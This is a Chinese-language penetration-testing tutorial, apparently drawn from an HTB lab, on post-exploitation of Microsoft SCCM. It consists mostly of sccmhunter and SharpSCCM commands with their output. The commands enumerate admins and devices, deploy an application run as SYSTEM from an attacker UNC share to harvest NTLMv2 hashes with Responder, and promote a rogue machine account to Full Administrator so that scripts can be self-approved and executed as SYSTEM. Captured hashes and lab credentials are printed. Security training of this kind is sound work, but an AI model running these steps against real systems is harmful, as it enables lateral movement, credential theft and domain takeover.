SCCM后渗透
1. SCCM 后渗透利用
SCCM 的主要目标是在 Active Directory 管理的资产上部署应用程序和服务,这使得 SCCM 基础设施成为在网络中进行横向移动的理想选择。通过对主服务器拥有管理权限,我们可以在目标设备上部署应用程序和脚本,或强制客户端进行身份验证。
此外,SCCM 允许枚举资源上的数据。在 SCCM 为管理员提供的所有服务中,有一个名为 CMPivot 的服务。该服务位于管理点服务器上,可以枚举计算机或计算机集合的所有资源(已安装的软件、本地管理员、硬件规格等),并对它们执行管理任务。它使用由 SMS Provider server 提供的 HTTP REST API AdminService
1.1. 特权账户枚举
我们可以通过查询 SMS_Admin 和 SMS_SCI_Reserved 这两个 WMI 类来枚举具有特权的 SCCM 用户,在sccmhunter的admin和show_admins模块即可获取这些信息
python3 sccmhunter.py admin -u rai -p Threathunting01 -ip 172.50.0.40
SCCMHunter v1.0.5 by @garrfoster
[09:04:17] INFO [!] Enter help for extra shell commands
() C:\ >> show_admins
[09:04:21] INFO Tasked SCCM to list current SMS Admins.
[09:04:22] INFO Current Full Admin Users:
[09:04:22] INFO LAB\sccm_admin
[09:04:22] INFO LAB\rai
1.2. 计算机枚举
要使用 CMPivot 来枚举目标计算机,第一步是获取待审计资源的 ID(这可以是特定机器或机器集合)。为了获取目标计算机的 ResourceId 及其他信息,我们可以使用命令 get_device <TARGET>
python3 sccmhunter.py admin -u rai -p Threathunting01 -ip 172.50.0.40
SCCMHunter v1.0.5 by @garrfoster
[19:24:58] INFO [!] Enter help for extra shell commands
() C:\ >> get_device SCCM-SMS
[19:25:21] INFO [*] Collecting device...
[19:25:21] INFO [+] Device found.
[19:25:21] INFO ------------------------------------------
Active: 1
Client: 1
DistinguishedName: CN=SCCM-SMS,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
IPAddresses: 172.50.0.40
LastLogonUserDomain: LAB
LastLogonUserName: Administrator
Name: SCCM-SMS
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceId: 16777221
ResourceNames: SCCM-SMS.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1216
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:2A1F8462-FAAC-4F8A-BDF9-7194AF172C2C
------------------------------------------
有时候sccmhunter会检索到错误的
ResourceId,我们可以使用SharpSCCM来获取到正确的ResourceId
PS C:\Tools> .\SharpSCCM.exe get devices -n SCCM-SMS -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Executing WQL query: SELECT ResourceId,Active,ADSiteName,Client,DistinguishedName,FullDomainName,HardwareID,IPAddresses,IPSubnets,IPv6Addresses,IPv6Prefixes,IsVirtualMachine,LastLogonTimestamp,LastLogonUserDomain,LastLogonUserName,MACAddresses,Name,NetbiosName,Obsolete,OperatingSystemNameandVersion,PrimaryGroupID,ResourceDomainORWorkgroup,ResourceNames,SID,SMSInstalledSites,SMSUniqueIdentifier,SNMPCommunityName,SystemContainerName,SystemGroupName,SystemOUName FROM SMS_R_System WHERE Name LIKE '%SCCM-SMS%'
-----------------------------------
SMS_R_System
-----------------------------------
Active: 1
ADSiteName: Default-First-Site-Name
Client: 1
DistinguishedName: CN=SCCM-SMS,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
HardwareID: 2:542AA89148DB7F12EE73FFE36E215010EF8F70E0
IPAddresses: 172.50.0.40
IPSubnets: 172.50.0.0
IPv6Addresses:
IPv6Prefixes:
IsVirtualMachine: True
LastLogonTimestamp: 20240722164258.000000+***
LastLogonUserDomain: SCCM-SMS
LastLogonUserName: Administrator
MACAddresses: 00:50:56:B9:61:89
Name: SCCM-SMS
NetbiosName: SCCM-SMS
Obsolete: 0
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceDomainORWorkgroup: LAB
ResourceId: 16777221
ResourceNames: SCCM-SMS.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1216
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:2A1F8462-FAAC-4F8A-BDF9-7194AF172C2C
SNMPCommunityName:
SystemContainerName: LAB\COMPUTERS
SystemGroupName:
SystemOUName:
-----------------------------------
[+] Completed execution in 00:00:16.4663955
1.2.1. 与目标进行交互
然后可以使用interact <ResourceId>命令与目标计算机进行交互,
() (C:\) >> interact 16777221
(16777221) (C:\) >> administrators
[19:26:31] INFO Tasked SCCM to run Administrators.
[19:26:31] INFO Got OperationId 16778237. Sleeping 10 seconds to wait for host to call home.
[19:26:41] INFO No results yet, sleeping 10 seconds.
[19:26:52] INFO +---------------+------------------------+-------------------+----------+
| ObjectClass | Name | PrincipalSource | Device |
+===============+========================+===================+==========+
| Group | LAB\Domain Admins | ActiveDirectory | SCCM-SMS |
+---------------+------------------------+-------------------+----------+
| User | LAB\sccm_admin | ActiveDirectory | SCCM-SMS |
+---------------+------------------------+-------------------+----------+
| User | LAB\SCCM01$ | ActiveDirectory | SCCM-SMS |
+---------------+------------------------+-------------------+----------+
| User | SCCM-SMS\Administrator | Local | SCCM-SMS |
+---------------+------------------------+-------------------+----------+
ls 可以查看目标计算机上的文件和文件夹
(16777221) (C:\) >> ls
[19:30:13] INFO Tasked SCCM to list files in C:\.
[19:30:13] INFO Got OperationId 16778238. Sleeping 10 seconds to wait for host to call home.
[19:30:23] INFO No results yet, sleeping 10 seconds.
[19:30:33] INFO +------------------------------+--------+---------------------+--------+----------+
| FileName | Mode | LastWriteTime | Size | Device |
+==============================+========+=====================+========+==========+
| C:\$Recycle.Bin | d--hs- | 2024-05-09 23:13:44 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\ContentLibrary | d----- | 2024-05-12 08:41:03 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Documents and Settings | d--hsl | 2024-05-09 19:59:16 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\inetpub | d----- | 2024-05-09 22:46:15 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\PerfLogs | d----- | 2022-11-05 18:20:48 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Program Files | d-r--- | 2024-05-10 13:14:30 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Program Files (x86) | d----- | 2024-05-10 10:20:32 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\ProgramData | d--h-- | 2024-05-10 13:20:43 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Recovery | d--hs- | 2024-05-09 20:00:28 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\SMS | d----- | 2024-05-10 10:22:38 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\System Volume Information | d--hs- | 2024-05-09 19:57:33 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Users | d-r--- | 2024-05-09 23:13:26 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\Windows | d----- | 2024-05-10 15:10:18 | 1 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
| C:\smstsvc.log | -a---- | 2024-05-10 10:20:45 | 1042 | SCCM-SMS |
+------------------------------+--------+---------------------+--------+----------+
更多的利用可以参考 sccmhunter wiki.
2. 应用程序部署
2.1. 枚举
SharpSCCM还能帮助我们枚举和滥用 SCCM 基础设施,前提是我们拥有对主服务器具有 Full Administrator 或 Application Administrator 权限的账户访问权
2.1.1. 验证是否有对应的权限
通过使用 SharpSCCM 查询 SMS_Admin WMI 类来验证我们是否拥有足够的权限,如果没有遇到访问被拒绝的提示,那么就可以继续下一步
PS C:\Tools> .\SharpSCCM.exe get class-instances SMS_Admin -p CategoryNames -p CollectionNames -p LogonName -p RoleNames -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Executing WQL query: SELECT AdminID,CategoryNames,CollectionNames,LogonName,RoleNames FROM SMS_Admin
-----------------------------------
SMS_Admin
-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: LAB\sccm_admin
RoleNames: Full Administrator
-----------------------------------
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: LAB\rai
RoleNames: Full Administrator
-----------------------------------
[+] Completed execution in 00:00:00.8509888
2.1.2. 搜索潜在目标
下一步是搜索潜在目标,即网络中可访问的活跃 SCCM 客户端。我们可以针对那些将特定用户声明为“主要用户”的机器(这是 Microsoft Configuration Manager 控制台中的一个选项,允许将某位用户指定为某台机器的主要使用者),或者搜索该用户最后一次进行身份验证的机器。
然而,后一种方案(搜索最后认证机器)的可靠性较低,因为它取决于通过 DDR(数据发现记录)请求刷新机器信息的频率。让我们使用 get primary-users 选项配合 -u <user> 参数,来搜索以 blwasp 作为主要用户的计算机:
PS C:\Tools> .\SharpSCCM.exe get primary-users -u blwasp -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Executing WQL query: SELECT * FROM SMS_UserMachineRelationship WHERE UniqueUserName LIKE '%blwasp%'
-----------------------------------
SMS_UserMachineRelationship
-----------------------------------
CreationTime: 20240522185628.677000+000
IsActive: True
RelationshipResourceID: 25165831
ResourceClientType: 1
ResourceID: 16777233
ResourceName: SRV01
Sources: 2
Types: 1
UniqueUserName: LAB\blwasp
-----------------------------------
[+] Completed execution in 00:00:00.6255289
此外也可以列出所有安装了 SCCM 客户端的活动 SCCM 设备,但请注意:在实际环境中输出结果可能非常庞大,使用选项 get devices 配合选项 -w <where-condition>可以有效的缩小查询范围
#只获取活跃的机器,且安装了SCCM客户端的机器
PS C:\Tools> .\SharpSCCM.exe get devices -w "Active=1 and Client=1" -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Executing WQL query: SELECT ResourceId,Active,ADSiteName,Client,DistinguishedName,FullDomainName,HardwareID,IPAddresses,IPSubnets,IPv6Addresses,IPv6Prefixes,IsVirtualMachine,LastLogonTimestamp,LastLogonUserDomain,LastLogonUserName,MACAddresses,Name,NetbiosName,Obsolete,OperatingSystemNameandVersion,PrimaryGroupID,ResourceDomainORWorkgroup,ResourceNames,SID,SMSInstalledSites,SMSUniqueIdentifier,SNMPCommunityName,SystemContainerName,SystemGroupName,SystemOUName FROM SMS_R_System WHERE Active=1 and Client=1
-----------------------------------
SMS_R_System
-----------------------------------
Active: 1
ADSiteName: Default-First-Site-Name
Client: 1
DistinguishedName: CN=SQL,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
HardwareID: 2:F6FC17A6192F8ADF5F0039F5A56CD2B3838E814D
IPAddresses: 172.50.0.30
IPSubnets: 172.50.0.0
IPv6Addresses:
IPv6Prefixes:
IsVirtualMachine: True
LastLogonTimestamp: 20240709192359.000000+***
LastLogonUserDomain: LAB
LastLogonUserName: administrator
MACAddresses: 00:50:56:B9:31:00
Name: SQL
NetbiosName: SQL
Obsolete: 0
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceDomainORWorkgroup: LAB
ResourceId: 16777219
ResourceNames: SQL.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1214
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:BD861888-7840-427C-9CC6-D4FFE022F55A
SNMPCommunityName:
SystemContainerName: LAB\COMPUTERS
SystemGroupName:
SystemOUName:
-----------------------------------
Active: 1
ADSiteName: Default-First-Site-Name
Client: 1
DistinguishedName: CN=SCCM01,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
HardwareID: 2:ECA2EFC6EA65B9B2280C0396F777019B4B52BEF8
IPAddresses: 172.50.0.21
IPSubnets: 172.50.0.0
IPv6Addresses: 0000:0000:0000:0000:0000:0000:0000:0001
IPv6Prefixes: 0000:0000:0000:0000
IsVirtualMachine: True
LastLogonTimestamp: 20240709194349.000000+***
LastLogonUserDomain: LAB
LastLogonUserName: sccm_admin
MACAddresses: 00:50:56:B9:52:50
Name: SCCM01
NetbiosName: SCCM01
Obsolete: 0
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceDomainORWorkgroup: LAB
ResourceId: 16777220
ResourceNames: SCCM01.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1215
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:BB9B4076-B45A-46DA-8994-D2DAC705BB9A
SNMPCommunityName:
SystemContainerName: LAB\COMPUTERS
SystemGroupName:
SystemOUName:
...SNIP...
当我们获取到了SCCM客户端的位置,且作为管理点管理员,我们可以部署应用程序,这包括:创建一个设备集合、将目标设备加入该集合、创建一个与该集合关联的应用程序部署,最后执行该部署。
我们可以选择以 SYSTEM 权限、主要用户身份或机器当前登录的用户账户身份来部署应用程序。SharpSCCM 能够自动化整个流程,且各类请求均通过先前介绍的 AdminService API 发送。然而,这种自动化方案可能会遇到时序问题,因为设备在检索并获取部署信息时存在一定的延迟。因此,在某些情况下,采用手动处理的方式会更加稳妥
此外,通过使用 UNC 路径指定待部署的应用程序,我们可以截获 NTLM 身份验证,从而为 NTLM 中继攻击创造条件,进而在目标机器上运行应用程序。这种方法的优势在于,相比直接安装并执行恶意负载,它的隐蔽性更强。
2.2. 手动部署应用程序
2.2.1. 创建应用
首先,创建一个名为 HTB_application 的新应用程序,选择 new application 和 -n <Application Name> 选项。还需指定有效载荷,使用 -p <Payload> 指向攻击主机上的路径,并通过 -s 选项指定该应用程序将作为 SYSTEM 部署:
PS C:\Tools> .\SharpSCCM.exe new application -s -n HTB_application -p \\10.10.14.207\share\test.exe -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Creating new application: HTB_application
[+] Application path: \\10.10.14.207\share\test.exe
[+] Updated application to run as SYSTEM
[+] Successfully created application
[+] Completed execution in 00:00:29.0535194
2.2.2. 创建集合
接着,创建一个新的设备集合,选项为 new collection 和 -n <collection name> 。此外,我们通过 -t device 选项指定要创建的集合类型为“设备
PS C:\Tools> .\SharpSCCM.exe new collection -n "new_collection" -t device -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Creating new device collection: new_collection
[+] Successfully created collection
[+] Completed execution in 00:00:01.6775452
2.2.3. 添加成员
使用命令 new collection-member 并通过选项 -d <DEVICE> 指定目标,将目标计算机添加到集合 new_collection 中
PS C:\Tools> .\SharpSCCM.exe new collection-member -d SRV01 -n "new_collection" -t device -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Found resource named SRV01 with ResourceID 16777233
[+] Added SRV01 (16777233) to new_collection
[+] Waiting for new collection member to become available...
[+] New collection member is not available yet... trying again in 5 seconds
[+] New collection member is not available yet... trying again in 5 seconds
[+] Successfully added SRV01 (16777233) to new_collection
[+] Completed execution in 00:00:16.7721935
2.2.4. 创建部署
创建一个 new deployment 并指定应用程序,选项为 -a <application name> ,集合为 -c <collection name>
PS C:\Tools> .\SharpSCCM.exe new deployment -a HTB_application -c "new_collection" -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Creating new deployment of HTB_application to new_collection (HTB0002E)
[+] Found the HTB_application application
[+] Successfully created deployment of HTB_application to new_collection (HTB0002E)
[+] New deployment name: HTB_application_HTB0002E_Install
[+] Completed execution in 00:00:02.8199982
2.2.5. 触发更新
等待设备检索部署并执行应用程序,我们也可以尝试通过调用更新来加速这个过程,但这并不总是有效:
PS C:\Tools> .\SharpSCCM.exe invoke update -n "new_collection" -sms 172.50.0.40
_______ _ _ _______ ______ _____ _______ _______ _______ _______
|______ |_____| |_____| |_____/ |_____] |______ | | | | |
______| | | | | | \_ | ______| |______ |______ | | | @_Mayyhem
[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Forcing all members of new_collection (HTB0002E) to retrieve machine policy and execute any new applications available
[+] Completed execution in 00:00:00.8182697
2.2.6. 捕获哈希
在我们的攻击主机上,收到了来自机器账户的 NTLMv2 认证:
responder -I tun0 -v -A
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Listening for events...
[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[SMB] NTLMv2-SSP Client : 10.129.230.38
[SMB] NTLMv2-SSP Username : LAB\SERVER-CLIENT$
[SMB] NTLMv2-SSP Hash : SERVER-CLIENT$::LAB:daf32ceafb525124:5AE0C28E40E5BFE4C5EC3CDCDDB3A07A:010100000000000080DA01C483ACDA013B6A7AADAD3BE73E0000000002000800490054005500550001001E00570049004E002D00560034004E00450037003600370030004D005900430004003400570049004E002D00560034004E00450037003600370030004D00590043002E0049005400550055002E004C004F00430041004C000300140049005400550055002E004C004F00430041004C000500140049005400550055002E004C004F00430041004C000700080080DA01C483ACDA0106000400020000000800300030000000000000000000000000400000AC33ACB2A278803189F1A999B1F72A9F8EBB12FAF56C31BA15A02FB9E9C85AFB0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E0031002E00380031000000000000000000
[SMB] NTLMv2-SSP Client : 10.129.230.38
[SMB] NTLMv2-SSP Username : LAB\sccm_naa
[SMB] NTLMv2-SSP Hash : sccm_naa::LAB:7c9ecd471a096e11:76576CE6ED016127D01C2295A8E6E4A4:010100000000000080DA01C483ACDA01A340CC85D16B99630000000002000800490054005500550001001E00570049004E002D00560034004E00450037003600370030004D005900430004003400570049004E002D00560034004E00450037003600370030004D00590043002E0049005400550055002E004C004F00430041004C000300140049005400550055002E004C004F00430041004C000500140049005400550055002E004C004F00430041004C000700080080DA01C483ACDA0106000400020000000800300030000000000000000000000000400000AC33ACB2A278803189F1A999B1F72A9F8EBB12FAF56C31BA15A02FB9E9C85AFB0A001000000000000000000000000000000000000900220063006900660073002F003100390032002E003100360038002E0031002E00380031000000000000000000
...SNIP...
由于机器账户认证失败,触发了回退使得NAA(网络访问账户)也尝试进行了身份验证。如果目标机器上运行着 WebClient 服务,同样有可能获取 HTTP 认证并将其中继到域控制器的 LDAP 服务,从而接管该机器
如果域控制器有策略阻止匿名访问共享,我们就无法使用此方法托管文件。我们可以像上面示例中那样仅用于获取 NTLM 请求,但也可以使用域内计算机上的任何共享文件夹来托管文件。
注意:此方法可能需要很长时间才能生效;如果需要立即访问,建议使用下面脚本部署的方法。
2.3. 脚本部署
除了应用程序外,SCCM 还允许在任何已注册的计算机上部署和执行 PowerShell 脚本。作为 SCCM 管理员,我们可以尝试在资源上部署脚本。
admin 模块为我们提供了许多不同的选项;我们可以在 wiki中了解更多相关信息。
2.3.1. 获取ResourceID
其中一个选项是执行脚本的可能性。正如我们之前所做的那样,我们将需要目标机器的 ResourceId。我们可以在 admin shell 中使用 get_device <device> 选项来枚举机器,从而获取我们想要执行命令的设备的 ResourceId:
python3 sccmhunter.py admin -u blwasp -p 'Password123!' -ip 172.50.0.40
SCCMHunter v1.0.5 by @garrfoster
[16:42:47] INFO [!] Enter help for extra shell commands
() (C:\) >> get_device sccm01[17:01:38] INFO ------------------------------------------
Active: 1
Client: 1
DistinguishedName: CN=SCCM01,CN=Computers,DC=lab,DC=local
FullDomainName: LAB.LOCAL
IPAddresses: 172.50.0.21
LastLogonUserDomain: LAB
LastLogonUserName: sccm_admin
Name: SCCM01
OperatingSystemNameandVersion: Microsoft Windows NT Server 10.0
PrimaryGroupID: 515
ResourceId: 16777220 ResourceNames: SCCM01.lab.local
SID: S-1-5-21-2570265163-3918697770-3667495639-1215
SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:BB9B4076-B45A-46DA-8994-D2DAC705BB9A
------------------------------------------
2.3.2. 执行脚本
得到了resourceId,我们可以尝试在 SRV01 上加载PowerShell 脚本文件,通过使用 interact <resourceid> 功能,然后输入 script /path/to/cmd.txt:
python3 sccmhunter.py admin -u rai -p 'Threathunting01' -ip 172.50.0.40
SCCMHunter v1.0.5 by @garrfoster
[19:31:54] INFO [!] Enter help for extra shell commands
() C:\ >> interact 16777221(16777221) (C:\) >> script /home/plaintext/htb/modules/sccm/cmd.txt[15:04:20] INFO [+] Updates script created successfully with GUID 8db90420-8acc-44b1-9d9a-6252322293dc.
[15:04:22] INFO [-] Hierarchy settings do not allow author's to approve their own scripts. All custom script execution will fail.[15:04:22] INFO [*] Try using alternate approval credentials.
[15:04:23] INFO [+] Script with GUID 8db90420-8acc-44b1-9d9a-6252322293dc deleted.
这里报错是因为:在 SCCM 环境中,默认情况下管理员无法同时创建和执行脚本,必须由另一名管理员验证脚本后才能执行
2.3.3. 绕过 同时创建&执行脚本限制
我们可以利用管理员权限将用户或计算机账户提升为 Full Administrator来绕过此限制
要提升先前创建的机器账户 PWNED$ ,必须拥有其 SID ,然后使用选项 add_admin <account> <SID> 来提升它:
(16777221) (C:\) >> get_device PWNED [19:38:03] INFO [*] Collecting device...
[19:38:03] INFO [+] Device found.
[19:38:04] INFO ------------------------------------------
Active: 1
Client: 1
DistinguishedName: None
FullDomainName: None
IPAddresses: []
LastLogonUserDomain: None
LastLogonUserName: None
Name: PWNED
OperatingSystemNameandVersion: None
PrimaryGroupID: None
ResourceId: 16777227
ResourceNames: PWNED.None
SID: S-1-5-21-2570265163-3918697770-3667495639-1218 SMSInstalledSites: HTB
SMSUniqueIdentifier: GUID:FC0CDB69-7174-4DCA-B21F-0312BF76FA39
------------------------------------------
(16777221) (C:\) >> add_admin PWNED$ S-1-5-21-2570265163-3918697770-3667495639-1218[19:38:28] INFO Tasked SCCM to add PWNED$ as an administrative user.
[19:38:29] INFO [+] Successfully added PWNED$ as an admin.
新的完全管理员账户可以作为审批账户,用于自动批准并执行脚本。我们使用备用用户账户参数 -au <account> 以及备用用户账户密码参数 -ap <Password>来审批我们的脚本即可
python3 sccmhunter.py admin -u blwasp -p 'Password123!' -ip 172.50.0.40 -au 'PWNED$' -ap ComputerPass123
SCCMHunter v1.0.5 by @garrfoster
[17:11:20] INFO [!] Enter help for extra shell commands
() C:\ >> interact 16777220
(16777220) (C:\) >> script /home/plaintext/htb/modules/sccm/cmd.txt[17:11:35] INFO [+] Updates script created successfully with GUID 913f7b53-2f86-4023-909e-1426dadcd338.
[17:11:36] INFO [+] Script with guid 913f7b53-2f86-4023-909e-1426dadcd338 approved.
[17:11:38] INFO [+] Script with guid 913f7b53-2f86-4023-909e-1426dadcd338 executed.
[17:11:55] INFO [+] Got result:
[17:11:55] INFO nt authority\\system SCCM01
[17:11:57] INFO [+] Script with GUID 913f7b53-2f86-4023-909e-1426dadcd338 deleted.